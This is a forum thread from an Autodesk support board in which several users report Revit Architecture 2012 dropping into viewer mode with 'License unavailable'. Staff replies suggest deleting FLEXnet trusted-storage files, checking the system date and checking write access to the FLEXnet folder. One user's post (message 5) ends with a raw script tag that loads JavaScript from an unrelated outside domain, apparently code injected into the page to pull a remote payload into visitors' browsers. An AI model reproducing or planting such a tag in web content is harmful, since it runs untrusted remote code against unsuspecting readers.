Installation & Licensing

Installation & Licensing

Reply
Active Member
gaja0012
Posts: 8
Registered: ‎01-12-2012
Message 1 of 10 (1,887 Views)

Issue regarding Revit 2012 installation and Licensing

1887 Views, 9 Replies
01-12-2012 10:17 AM

Hi. I have a serious issue regarding license to my Revit Acrchitecture 2012 and activation of the product. I've bought a new laptop and installed Revit 2012 on it and in the beginning it worked fine without any problems with activation and licensing, but then after some time suddenly says " Autodesk Revit Architecture 2012, Build:20110309_2315(x64) License unavailable. A license is required to run Autodesk Revit Achitecture 2012 on this computer" and Revit then tells me, that I'm only in a viewer modeopened Revit.

Afterwards I tried to reinstall Revit and  after I enter the serial number and product key in the installation process, I don't get to the point where I can enter the activation code, cause when I open revit (after installed) it immediately says " Autodesk Revit Architecture 2012, Build:20110309_2315(x64) License unavailable. A license is required to run Autodesk Revit Achitecture 2012 on this computer" and the Revit tells me, that I'm only in a viewer mode and can't do anything. When I try to press "Help" and the "About" and the click on "Product license information" I get same message that my License is unavailable and Revit is in viewer mode and leave me with a Revit software I can't work with. Can anyone please help me?? My studies is all about Revit, so it's a vital software for me Kind regards Gajan Rasathurai

Alumni
INACTIVE_Timmy.DeAustria
Posts: 72
Registered: ‎10-04-2011
Message 2 of 10 (1,882 Views)

Re: Issue regarding Revit 2012 installation and Licensing

01-12-2012 11:13 AM in reply to: gaja0012

Try deleting the trusted storage files (DATA and Backup) that can be found here:

 

Windows Vista/Windows 7
C:\ProgramData\FLEXnet\adskflex_00691b00_tsf.data
C:\ProgramData\FLEXnet\adskflex_00691b00_tsf.data_backup.001

 

XP
C:\Documents and Settings\All Users\Application Data\FLEXnet\adskflex_00691b00_tsf.data
C:\Documents and Settings\All Users\Application Data\FLEXnet\adskflex_00691b00_tsf.data_backup.001

 

Hope it works for you...

 

 

 

 



Timmy De Austria
Product Support | Up and Ready Blog | If my reply was helpful, please Kudo or Accept as Solution. :smileywink:
Active Member
gaja0012
Posts: 8
Registered: ‎01-12-2012
Message 3 of 10 (1,876 Views)

Re: Issue regarding Revit 2012 installation and Licensing

01-12-2012 11:45 AM in reply to: INACTIVE_Timmy.DeAustria

It did'nt work, but thanks anyway

New Member
lance.hunter
Posts: 1
Registered: ‎04-10-2012
Message 4 of 10 (1,664 Views)

Re: Issue regarding Revit 2012 installation and Licensing

04-10-2012 11:19 AM in reply to: gaja0012

I'm having the same problem. The 2011 edition worked for me just fine. I emailed the support team and they ask for a product code, which I cannot access in viewer mode. Also I am using the education edition. I'm not sure if this would have anything to do with it. 

New Member
mizo31
Posts: 1
Registered: ‎10-09-2012
Message 5 of 10 (1,308 Views)

Re: Issue regarding Revit 2012 installation and Licensing

10-09-2012 02:52 AM in reply to: gaja0012

I have the same problem with the same version, so please if you succeed to solve it inform me how can i solve mine.
And vice versa, thanks :smileyhappy:

 

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
New Member
K.linderboom
Posts: 2
Registered: ‎11-03-2011
Message 6 of 10 (1,258 Views)

Re: Issue regarding Revit 2012 installation and Licensing

10-17-2012 03:39 PM in reply to: gaja0012

Has anyone solved this issue yet?

Employee
DannyHubbard
Posts: 280
Registered: ‎05-17-2007
Message 7 of 10 (1,230 Views)

Re: Issue regarding Revit 2012 installation and Licensing

10-18-2012 08:18 AM in reply to: K.linderboom

 

First make sure the date and time on your computer is fairly accurate.

Second make sure you have Read and Write access to the FlexNet folder (see Timmy's post above for the exact path).   Can you go to the FlexNet folder and create a new text file, then delete it.

 

Thanks,

Danny



Danny Hubbard
QA Analyst
Autodesk, Inc.
New Member
K.linderboom
Posts: 2
Registered: ‎11-03-2011
Message 8 of 10 (1,215 Views)

Re: Issue regarding Revit 2012 installation and Licensing

10-18-2012 03:41 PM in reply to: gaja0012

Worked a treat, thanks! 

New Member
candice.vdl
Posts: 1
Registered: ‎09-23-2013
Message 9 of 10 (607 Views)

Re: Issue regarding Revit 2012 installation and Licensing

09-23-2013 07:46 AM in reply to: gaja0012

Hi, I am having a similar problem. I worked on a revit project and when I tried to save it, it said the following:

 

Autodesk Revit Architecture 2012

Build:20110309_2315

License unavailable. Autodesk Revit Achitecture 2012 is in viewer mode

 

Viewer mode allows all functionality of Revit, except the following:save or save as in all clases; exporting or publising modified projects; exporting or publishing any projects to a format containing model data that can be modified; or printing projects after changes are made.

 

I am running Microsoft Windows XP Professional Version 2002, Service pack 3. 

 

Tried to find the files to delete as per "timmy" but could not find them. 

 

Please help! Candice

 

 

 

 

 

Product Support
dembkod
Posts: 560
Registered: ‎05-26-2010
Message 10 of 10 (597 Views)

Re: Issue regarding Revit 2012 installation and Licensing

09-23-2013 08:28 AM in reply to: candice.vdl

candice.vdl,

 

Hello. This means your product does not have a license. When you start the program, does it tell you it is in trial mode or ask you to activate? This message would appear if: you never activated or you lost your network license, possibly due to inactivity.

 

Thank you for taking part in our community!



David Dembkoski
Need installation help?

Start with some of our most frequented solutions or visit the Installation and Licensing Forum to get help installing your software.